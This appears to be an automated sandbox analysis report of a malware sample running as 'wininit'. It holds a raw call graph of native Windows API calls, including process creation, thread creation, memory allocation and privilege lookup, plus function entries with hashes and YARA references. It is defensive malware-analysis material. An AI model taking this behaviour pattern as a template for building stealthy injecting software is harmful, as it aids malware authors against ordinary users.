f373d 65303->65305 65306 f3751 65304->65306 65305->65260 65361 fa2b0 LdrLoadDll RtlAllocateHeap 65306->65361 65308 f375c 65308->65260 65310 f348e 65309->65310 65311 f345b 65309->65311 65312 f35d9 65310->65312 65316 f34aa 65310->65316 65313 f8560 LdrLoadDll 65311->65313 65315 f8560 LdrLoadDll 65312->65315 65314 f3476 65313->65314 65317 f8710 2 API calls 65314->65317 65320 f35f4 65315->65320 65318 f8560 LdrLoadDll 65316->65318 65319 f347f 65317->65319 65321 f34c5 65318->65321 65319->65263 65374 f85a0 LdrLoadDll 65320->65374 65323 f34cc 65321->65323 65324 f34e1 65321->65324 65326 f8710 2 API calls 65323->65326 65327 f34fc 65324->65327 65328 f34e6 65324->65328 65325 f362e 65329 f8710 2 API calls 65325->65329 65330 f34d5 65326->65330 65336 f3501 65327->65336 65362 fa270 65327->65362 65331 f8710 2 API calls 65328->65331 65332 f3639 65329->65332 65330->65263 65333 f34ef 65331->65333 65332->65263 65333->65263 65345 f3513 65336->65345 65365 f8690 65336->65365 65337 f3567 65338 f357e 65337->65338 65373 f8520 LdrLoadDll 65337->65373 65340 f359a 65338->65340 65341 f3585 65338->65341 65342 f8710 2 API calls 65340->65342 65343 f8710 2 API calls 65341->65343 65344 f35a3 65342->65344 65343->65345 65346 f35cf 65344->65346 65368 f9e70 65344->65368 65345->65263 65346->65263 65348 f35ba 65349 fa0a0 2 API calls 65348->65349 65350 f35c3 65349->65350 65350->65263 65351->65235 65352->65257 65354 f3d14 65353->65354 65355 f91e0 LdrLoadDll 65353->65355 65356 f85a0 LdrLoadDll 65354->65356 65355->65354 65356->65259 65358 f872c NtClose 65357->65358 65359 f91e0 LdrLoadDll 65357->65359 65358->65264 65359->65358 65360->65244 65361->65308 65375 f88b0 65362->65375 65364 fa288 65364->65336 65366 f91e0 LdrLoadDll 65365->65366 65367 f86ac NtReadFile 65366->65367 65367->65337 65369 f9e7d 65368->65369 65370 f9e94 65368->65370 65369->65370 65371 fa270 2 API calls 65369->65371 65370->65348 65372 f9eab 65371->65372 65372->65348 65373->65338 65374->65325 65376 f91e0 LdrLoadDll 65375->65376 65377 f88cc RtlAllocateHeap 65376->65377 65377->65364 65379 fa04d 65378->65379 65508 f87c0 65378->65508 65379->65269 65382 f3071 65381->65382 65383 f3079 65381->65383 65382->65272 65412 f334c 65383->65412 65511 fb250 65383->65511 65385 f30cd 65386 fb250 2 API calls 65385->65386 65389 f30d8 65386->65389 65387 f3126 65390 fb250 2 API calls 65387->65390 65389->65387 65391 fb380 3 API calls 65389->65391 65525 fb2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 65389->65525 65393 f313a 65390->65393 65391->65389 65392 f3197 65394 fb250 2 API calls 65392->65394 65393->65392 65516 fb380 65393->65516 65396 f31ad 65394->65396 65397 f31ea 65396->65397 65400 fb380 3 API calls 65396->65400 65398 fb250 2 API calls 65397->65398 65399 f31f5 65398->65399 65401 f322f 65399->65401 65402 fb380 3 API calls 65399->65402 65400->65396 65522 fb2b0 65401->65522 65402->65399 65405 fb2b0 2 API calls 65406 f332e 65405->65406 65407 fb2b0 2 API calls 65406->65407 65408 f3338 65407->65408 65409 fb2b0 2 API calls 65408->65409 65410 f3342 65409->65410 65411 fb2b0 2 API calls 65410->65411 65411->65412 65412->65272 65414 f43a1 65413->65414 65415 f3a50 8 API calls 65414->65415 65416 f43b7 65415->65416 65417 f4405 65416->65417 65418 f43f2 65416->65418 65422 f440a 65416->65422 65420 fa0a0 2 API calls 65417->65420 65419 fa0a0 2 API calls 65418->65419 65421 f43f7 65419->65421 65420->65422 65421->65276 65422->65276 65526 f8eb0 65423->65526 65426 f8eb0 LdrLoadDll 65427 f900d 65426->65427 65428 f8eb0 LdrLoadDll 65427->65428 65429 f9016 65428->65429 65430 f8eb0 LdrLoadDll 65429->65430 65431 f901f 65430->65431 65432 f8eb0 LdrLoadDll 65431->65432 65433 f9028 65432->65433 65434 f8eb0 LdrLoadDll 65433->65434 65435 f9031 65434->65435 65436 f8eb0 LdrLoadDll 65435->65436 65437 f903d 65436->65437 65438 f8eb0 LdrLoadDll 65437->65438 65439 f9046 65438->65439 65440 f8eb0 LdrLoadDll 65439->65440 65441 f904f 65440->65441 65442 f8eb0 LdrLoadDll 65441->65442 65443 f9058 65442->65443 65444 f8eb0 LdrLoadDll 65443->65444 65445 f9061 65444->65445 65446 f8eb0 LdrLoadDll 65445->65446 65447 f906a 65446->65447 65448 f8eb0 LdrLoadDll 65447->65448 65449 f9076 65448->65449 65450 f8eb0 LdrLoadDll 65449->65450 65451 f907f 65450->65451 65452 f8eb0 LdrLoadDll 65451->65452 65453 f9088 65452->65453 65454 f8eb0 LdrLoadDll 65453->65454 65455 f9091 65454->65455 65456 f8eb0 LdrLoadDll 65455->65456 65457 f909a 65456->65457 65458 f8eb0 LdrLoadDll 65457->65458 65459 f90a3 65458->65459 65460 f8eb0 LdrLoadDll 65459->65460 65461 f90af 65460->65461 65462 f8eb0 LdrLoadDll 65461->65462 65463 f90b8 65462->65463 65464 f8eb0 LdrLoadDll 65463->65464 65465 f90c1 65464->65465 65466 f8eb0 LdrLoadDll 65465->65466 65467 f90ca 65466->65467 65468 f8eb0 LdrLoadDll 65467->65468 65469 f90d3 65468->65469 65470 f8eb0 LdrLoadDll 65469->65470 65471 f90dc 65470->65471 65472 f8eb0 LdrLoadDll 65471->65472 65473 f90e8 65472->65473 65474 f8eb0 LdrLoadDll 65473->65474 65475 f90f1 65474->65475 65476 f8eb0 LdrLoadDll 65475->65476 65477 f90fa 65476->65477 65478 f8eb0 LdrLoadDll 65477->65478 65479 f9103 65478->65479 65480 f8eb0 LdrLoadDll 65479->65480 65481 f910c 65480->65481 65482 f8eb0 LdrLoadDll 65481->65482 65483 f9115 65482->65483 65484 f8eb0 LdrLoadDll 65483->65484 65485 f9121 65484->65485 65486 f8eb0 LdrLoadDll 65485->65486 65487 f912a 65486->65487 65488 f8eb0 LdrLoadDll 65487->65488 65489 f9133 65488->65489 65490 f8eb0 LdrLoadDll 65489->65490 65491 f913c 65490->65491 65492 f8eb0 LdrLoadDll 65491->65492 65493 f9145 65492->65493 65494 f8eb0 LdrLoadDll 65493->65494 65495 f914e 65494->65495 65496 f8eb0 LdrLoadDll 65495->65496 65497 f915a 65496->65497 65498 f8eb0 LdrLoadDll 65497->65498 65499 f9163 65498->65499 65500 f8eb0 LdrLoadDll 65499->65500 65501 f916c 65500->65501 65501->65280 65503 f91e0 LdrLoadDll 65502->65503 65504 f815c 65503->65504 65532 251fdc0 LdrInitializeThunk 65504->65532 65505 f8173 65505->65200 65507->65278 65509 f91e0 LdrLoadDll 65508->65509 65510 f87dc NtAllocateVirtualMemory 65509->65510 65510->65379 65512 fb266 65511->65512 65513 fb260 65511->65513 65514 fa270 2 API calls 65512->65514 65513->65385 65515 fb28c 65514->65515 65515->65385 65517 fb2f0 65516->65517 65518 fb34d 65517->65518 65519 fa270 2 API calls 65517->65519 65518->65393 65520 fb32a 65519->65520 65521 fa0a0 2 API calls 65520->65521 65521->65518 65523 fa0a0 2 API calls 65522->65523 65524 f3324 65523->65524 65524->65405 65525->65389 65527 f8ecb 65526->65527 65528 f3e50 LdrLoadDll 65527->65528 65529 f8eeb 65528->65529 65530 f3e50 LdrLoadDll 65529->65530 65531 f8f97 65529->65531 65530->65531 65531->65426 65532->65505 65533->65286 65535 f890c RtlFreeHeap 65534->65535 65536 f91e0 LdrLoadDll 65534->65536 65535->65289 65536->65535 65538 e6e2b 65537->65538 65539 e6e30 65537->65539 65538->65208 65540 fa020 2 API calls 65539->65540 65543 e6e55 65540->65543 65541 e6eb8 65541->65208 65542 f8140 2 API calls 65542->65543 65543->65541 65543->65542 65544 e6ebe 65543->65544 65548 fa020 2 API calls 65543->65548 65553 f8840 65543->65553 65546 e6ee4 65544->65546 65547 f8840 2 API calls 65544->65547 65546->65208 65549 e6ed5 65547->65549 65548->65543 65549->65208 65551 e70fe 65550->65551 65552 f8840 2 API calls 65550->65552 65551->65169 65552->65551 65554 f885c 65553->65554 65555 f91e0 LdrLoadDll 65553->65555 65558 251fb68 LdrInitializeThunk 65554->65558 65555->65554 65556 f8873 65556->65543 65558->65556 65560 f9843 65559->65560 65563 e9b40 65560->65563 65564 e9b64 65563->65564 65565 e8a7b 65564->65565 65566 e9ba0 LdrLoadDll 65564->65566 65565->65177 65566->65565 65568 e9eb3 65567->65568 65570 e9f30 65568->65570 65583 f7f10 LdrLoadDll 65568->65583 65570->65182 65572 f91e0 LdrLoadDll 65571->65572 65573 ecfab 65572->65573 65573->65190 65574 f8a50 65573->65574 65575 f8a56 65574->65575 65576 f91e0 LdrLoadDll 65575->65576 65577 f8a6f LookupPrivilegeValueW 65576->65577 65577->65186 65579 f84fc 65578->65579 65580 f91e0 LdrLoadDll 65578->65580 65584 251fed0 LdrInitializeThunk 65579->65584 65580->65579 65581 f851b 65581->65187 65583->65570 65584->65581 65586 ea037 65585->65586 65587 e9e90 LdrLoadDll 65586->65587 65588 ea066 65587->65588 65588->65128 65590 e9d84 65589->65590 65643 f7f10 LdrLoadDll 65590->65643 65592 e9dbe 65592->65130 65594 ed19c 65593->65594 65595 ea010 LdrLoadDll 65594->65595 65596 ed1ae 65595->65596 65644 ed080 65596->65644 65599 ed1c9 65602 ed1d4 65599->65602 65603 f8710 2 API calls 65599->65603 65600 ed1e1 65601 ed1f2 65600->65601 65604 f8710 2 API calls 65600->65604 65601->65133 65602->65133 65603->65602 65604->65601 65606 eaee6 65605->65606 65607 eaef0 65605->65607 65606->65142 65608 e9e90 LdrLoadDll 65607->65608 65609 eaf61 65608->65609 65610 e9d60 LdrLoadDll 65609->65610 65611 eaf75 65610->65611 65612 eaf98 65611->65612 65613 e9e90 LdrLoadDll 65611->65613 65612->65142 65614 eafb4 65613->65614 65615 f3a50 8 API calls 65614->65615 65616 eb009 65615->65616 65616->65142 65618 eba66 65617->65618 65619 e9e90 LdrLoadDll 65618->65619 65620 eba7a 65619->65620 65663 eb730 65620->65663 65622 e7f8c 65641 eb020 LdrLoadDll 65622->65641 65625 e7c83 65623->65625 65692 ed430 65623->65692 65636 e7e31 65625->65636 65697 f33a0 65625->65697 65627 e7ce2 65627->65636 65700 e7a20 65627->65700 65630 fb250 2 API calls 65631 e7d29 65630->65631 65632 fb380 3 API calls 65631->65632 65637 e7d3e 65632->65637 65633 e6e20 4 API calls 65633->65637 65636->65154 65637->65633 65637->65636 65639 e70e0 2 API calls 65637->65639 65705 eac00 65637->65705 65755 ed3d0 65637->65755 65759 eceb0 21 API calls 65637->65759 65639->65637 65640->65134 65641->65147 65642->65151 65643->65592 65645 ed09a 65644->65645 65653 ed150 65644->65653 65646 e9e90 LdrLoadDll 65645->65646 65647 ed0bc 65646->65647 65654 f81c0 65647->65654 65649 ed0fe 65657 f8200 65649->65657 65652 f8710 2 API calls 65652->65653 65653->65599 65653->65600 65655 f81dc 65654->65655 65656 f91e0 LdrLoadDll 65654->65656 65655->65649 65656->65655 65658 f821c 65657->65658 65659 f91e0 LdrLoadDll 65657->65659 65662 25207ac LdrInitializeThunk 65658->65662 65659->65658 65660 ed144 65660->65652 65662->65660 65664 eb747 65663->65664 65672 ed470 65664->65672 65668 eb7bb 65669 eb7c2 65668->65669 65683 f8520 LdrLoadDll 65668->65683 65669->65622 65671 eb7d5 65671->65622 65673 ed495 65672->65673 65684 e7120 65673->65684 65675 ed4b9 65676 eb78f 65675->65676 65677 f3a50 8 API calls 65675->65677 65679 fa0a0 2 API calls 65675->65679 65691 ed2b0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 65675->65691 65680 f8960 65676->65680 65677->65675 65679->65675 65681 f91e0 LdrLoadDll 65680->65681 65682 f897f CreateProcessInternalW 65681->65682 65682->65668 65683->65671 65685 e721f 65684->65685 65686 e7135 65684->65686 65685->65675 65686->65685 65687 f3a50 8 API calls 65686->65687 65688 e71a2 65687->65688 65689 fa0a0 2 API calls 65688->65689 65690 e71c9 65688->65690 65689->65690 65690->65675 65691->65675 65693 ed44f 65692->65693 65694 f3e50 LdrLoadDll 65692->65694 65695 ed45d 65693->65695 65696 ed456 SetErrorMode 65693->65696 65694->65693 65695->65625 65696->65695 65760 ed200 65697->65760 65699 f33c6 65699->65627 65701 fa020 2 API calls 65700->65701 65704 e7a45 65700->65704 65701->65704 65702 e7c5a 65702->65630 65704->65702 65779 f7b00 65704->65779 65706 eac19 65705->65706 65707 eac1f 65705->65707 65827 eccc0 65706->65827 65836 e8620 65707->65836 65710 eac2c 65711 fb380 3 API calls 65710->65711 65754 eaeb8 65710->65754 65712 eac48 65711->65712 65713 eac5c 65712->65713 65714 ed3d0 2 API calls 65712->65714 65845 f7f90 65713->65845 65714->65713 65717 ead86 65861 eaba0 LdrLoadDll LdrInitializeThunk 65717->65861 65718 f8180 2 API calls 65719 eacda 65718->65719 65719->65717 65724 eace6 65719->65724 65721 eada5 65722 eadad 65721->65722 65862 eab10 LdrLoadDll NtClose LdrInitializeThunk 65721->65862 65726 f8710 2 API calls 65722->65726 65725 ead2f 65724->65725 65730 f8290 2 API calls 65724->65730 65724->65754 65728 f8710 2 API calls 65725->65728 65727 eadb7 65726->65727 65727->65637 65731 ead4c 65728->65731 65729 eadcf 65729->65722 65732 eadd6 65729->65732 65730->65725 65848 f75b0 65731->65848 65734 eadee 65732->65734 65863 eaa90 LdrLoadDll LdrInitializeThunk 65732->65863 65864 f8010 LdrLoadDll 65734->65864 65735 ead63 65735->65754 65851 e7280 65735->65851 65738 eae02 65865 ea910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 65738->65865 65742 eae26 65751 eae73 65742->65751 65866 f8040 LdrLoadDll 65742->65866 65745 eae81 65747 f8710 2 API calls 65745->65747 65746 eae44 65746->65751 65867 f80d0 LdrLoadDll 65746->65867 65748 eae8b 65747->65748 65750 f8710 2 API calls 65748->65750 65752 eae95 65750->65752 65868 f80a0 LdrLoadDll 65751->65868 65753 e7280 3 API calls 65752->65753 65752->65754 65753->65754 65754->65637 65756 ed3e3 65755->65756 65940 f8110 65756->65940 65759->65637 65761 ed21d 65760->65761 65767 f8240 65761->65767 65764 ed265 65764->65699 65768 f825c 65767->65768 65769 f91e0 LdrLoadDll 65767->65769 65777 251ffb4 LdrInitializeThunk 65768->65777 65769->65768 65770 ed25e 65770->65764 65772 f8290 65770->65772 65773 f82ac 65772->65773 65774 f91e0 LdrLoadDll 65772->65774 65778 251fc60 LdrInitializeThunk 65773->65778 65774->65773 65775 ed28e 65775->65699 65777->65770 65778->65775 65780 fa270 2 API calls 65779->65780 65781 f7b17 65780->65781 65800 e8160 65781->65800 65783 f7b32 65784 f7b59 65783->65784 65785 f7b70 65783->65785 65786 fa0a0 2 API calls 65784->65786 65787 fa020 2 API calls 65785->65787 65788 f7b66 65786->65788 65789 f7baa 65787->65789 65788->65702 65790 fa020 2 API calls 65789->65790 65791 f7bc3 65790->65791 65797 f7e64 65791->65797 65806 fa060 LdrLoadDll 65791->65806 65793 f7e49 65794 f7e50 65793->65794 65793->65797 65795 fa0a0 2 API calls 65794->65795 65796 f7e5a 65795->65796 65796->65702 65798 fa0a0 2 API calls 65797->65798 65799 f7eb9 65798->65799 65799->65702 65801 e8185 65800->65801 65802 e9b40 LdrLoadDll 65801->65802 65803 e81b8 65802->65803 65805 e81dd 65803->65805 65807 eb340 65803->65807 65805->65783 65806->65793 65808 eb36c 65807->65808 65809 f8460 LdrLoadDll 65808->65809 65810 eb385 65809->65810 65811 eb38c 65810->65811 65818 f84a0 65810->65818 65811->65805 65815 eb3c7 65816 f8710 2 API calls 65815->65816 65817 eb3ea 65816->65817 65817->65805 65819 f84bc 65818->65819 65820 f91e0 LdrLoadDll 65818->65820 65826 251fbb8 LdrInitializeThunk 65819->65826 65820->65819 65821 eb3af 65821->65811 65823 f8a90 65821->65823 65824 f91e0 LdrLoadDll 65823->65824 65825 f8aaf 65824->65825 65825->65815 65826->65821 65828 eccd7 65827->65828 65869 ebdb0 65827->65869 65830 eccf0 65828->65830 65882 e3d70 65828->65882 65832 fa270 2 API calls 65830->65832 65834 eccfe 65832->65834 65833 eccea 65906 f7430 65833->65906 65834->65707 65837 e863b 65836->65837 65838 ed080 3 API calls 65837->65838 65844 e875b 65837->65844 65839 e873c 65838->65839 65840 e876a 65839->65840 65841 e8751 65839->65841 65842 f8710 2 API calls 65839->65842 65840->65710 65939 e5ea0 LdrLoadDll 65841->65939 65842->65841 65844->65710 65846 eacb0 65845->65846 65847 f91e0 LdrLoadDll 65845->65847 65846->65717 65846->65718 65846->65754 65847->65846 65849 ed3d0 2 API calls 65848->65849 65850 f75e2 65849->65850 65850->65735 65852 e7298 65851->65852 65853 e72b3 65852->65853 65854 e9b40 LdrLoadDll 65852->65854 65855 f3e50 LdrLoadDll 65853->65855 65854->65853 65856 e72c3 65855->65856 65857 e72fd 65856->65857 65858 e72cc PostThreadMessageW 65856->65858 65857->65637 65859 e72db 65858->65859 65859->65857 65860 e72ea PostThreadMessageW 65859->65860 65860->65857 65861->65721 65862->65729 65863->65734 65864->65738 65865->65742 65866->65746 65867->65751 65868->65745 65870 ebde3 65869->65870 65911 ea150 65870->65911 65872 ebdf5 65915 ea2c0 65872->65915 65874 ebe13 65875 ea2c0 LdrLoadDll 65874->65875 65876 ebe29 65875->65876 65877 ed200 3 API calls 65876->65877 65878 ebe4d 65877->65878 65879 ebe54 65878->65879 65918 fa2b0 LdrLoadDll RtlAllocateHeap 65878->65918 65879->65828 65881 ebe64 65881->65828 65883 e3d96 65882->65883 65884 eb340 3 API calls 65883->65884 65886 e3e61 65884->65886 65885 e3e68 65885->65833 65886->65885 65919 fa2f0 65886->65919 65888 e3ec9 65889 e9e90 LdrLoadDll 65888->65889 65890 e3fd3 65889->65890 65891 e9e90 LdrLoadDll 65890->65891 65892 e3ff7 65891->65892 65923 eb400 65892->65923 65896 e4083 65897 fa020 2 API calls 65896->65897 65898 e4110 65897->65898 65899 fa020 2 API calls 65898->65899 65901 e412a 65899->65901 65900 e42a6 65900->65833 65901->65900 65902 e9e90 LdrLoadDll 65901->65902 65903 e416a 65902->65903 65904 e9d60 LdrLoadDll 65903->65904 65905 e420a 65904->65905 65905->65833 65907 f7451 65906->65907 65908 f3e50 LdrLoadDll 65906->65908 65909 f7477 65907->65909 65910 f7464 CreateThread 65907->65910 65908->65907 65909->65830 65910->65830 65912 ea177 65911->65912 65913 e9e90 LdrLoadDll 65912->65913 65914 ea1b3 65913->65914 65914->65872 65916 e9e90 LdrLoadDll 65915->65916 65917 ea2d9 65916->65917 65917->65874 65918->65881 65920 fa2fd 65919->65920 65921 f3e50 LdrLoadDll 65920->65921 65922 fa310 65921->65922 65922->65888 65924 eb425 65923->65924 65932 f8310 65924->65932 65927 f83a0 65928 f91e0 LdrLoadDll 65927->65928 65929 f83bc 65928->65929 65938 251fab8 LdrInitializeThunk 65929->65938 65930 f83db 65930->65896 65933 f91e0 LdrLoadDll 65932->65933 65934 f832c 65933->65934 65937 251fb50 LdrInitializeThunk 65934->65937 65935 e405c 65935->65896 65935->65927 65937->65935 65938->65930 65939->65844 65941 f812c 65940->65941 65942 f91e0 LdrLoadDll 65940->65942 65945 251fd8c LdrInitializeThunk 65941->65945 65942->65941 65943 ed40e 65943->65637 65945->65943 65947 f7300 65948 fa020 2 API calls 65947->65948 65950 f733b 65947->65950 65948->65950 65949 f741c 65950->65949 65951 e9b40 LdrLoadDll 65950->65951 65952 f7371 65951->65952 65953 f3e50 LdrLoadDll 65952->65953 65955 f738d 65953->65955 65954 f73a0 Sleep 65954->65955 65955->65949 65955->65954 65958 f6f30 LdrLoadDll 65955->65958 65959 f7130 LdrLoadDll 65955->65959 65958->65955 65959->65955

                                                Executed Functions

                                                Function 000F85DA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 261 f85da-f8631 call f91e0 NtCreateFile
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,000F3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000F3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 000F862D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: be12d34cabbb28e97c4079e3512672dcec8cf5e5b17e8b82af740d5cb265c7c5
                                                • Instruction ID: bc74ebc2c1a53e40483537335b362215b5de44ab357e5a4ee797b379223ad704
                                                • Opcode Fuzzy Hash: be12d34cabbb28e97c4079e3512672dcec8cf5e5b17e8b82af740d5cb265c7c5
                                                • Instruction Fuzzy Hash: 8801B2B6200108AFDB08DF88DC95EEB77A9FF8C354F158259FA0D97241D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F85E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 264 f85e0-f85f6 265 f85fc-f8631 NtCreateFile 264->265 266 f85f7 call f91e0 264->266 266->265
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,000F3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000F3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 000F862D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: c77310d449c0be41e1d1e580a5741785b1b37c36f7a1ead8f91ee8e80c9b441a
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: BBF0BDB2204208ABCB08DF88DC85EEB77ADAF8C754F158248FA0D97241C630F811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F8690, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(000F3D72,5E972F65,FFFFFFFF,000F3A31,?,?,000F3D72,?,000F3A31,FFFFFFFF,5E972F65,000F3D72,?,00000000), ref: 000F86D5
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: 7ee59263f502b6ebdb51afa4532fc48ab2403b67a60900eab42f30424adeaa3a
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: 30F0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158258BE1D97241D630E911CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F87C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000E2D11,00002000,00003000,00000004), ref: 000F87F9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction ID: 0b3e7a1c7995605b3abb60cf7925e9896edff0d9f77f5d7994a2ae4ae766ef43
                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction Fuzzy Hash: 3FF015B2200208ABCB14DF89CC81EEB77ADAF88750F118158FE0897241C630F910CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F8710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(000F3D50,?,?,000F3D50,00000000,FFFFFFFF), ref: 000F8735
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: a59e846a552b7266872e8c27b175aa604b740f6f37a1c62ab40dab2bb698f618
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: 28D012752002146BD710EB98CC45FE7775CEF44750F154455BA185B242C530F600C6E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F870B, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(000F3D50,?,?,000F3D50,00000000,FFFFFFFF), ref: 000F8735
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: b39f3d5f1e6191cbd2ad9c44986a4f7a019309b22d5d8090dbe028a3430b0010
                                                • Instruction ID: 52e3640c33b021f095d447090f9020c348f1b38f203da1a1bf768c618c1633db
                                                • Opcode Fuzzy Hash: b39f3d5f1e6191cbd2ad9c44986a4f7a019309b22d5d8090dbe028a3430b0010
                                                • Instruction Fuzzy Hash: FAD02B7D40D3C04FD715FB74A8C10DBBF40EE825247145E9EE8E407543C260E215EB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025200C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025207AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
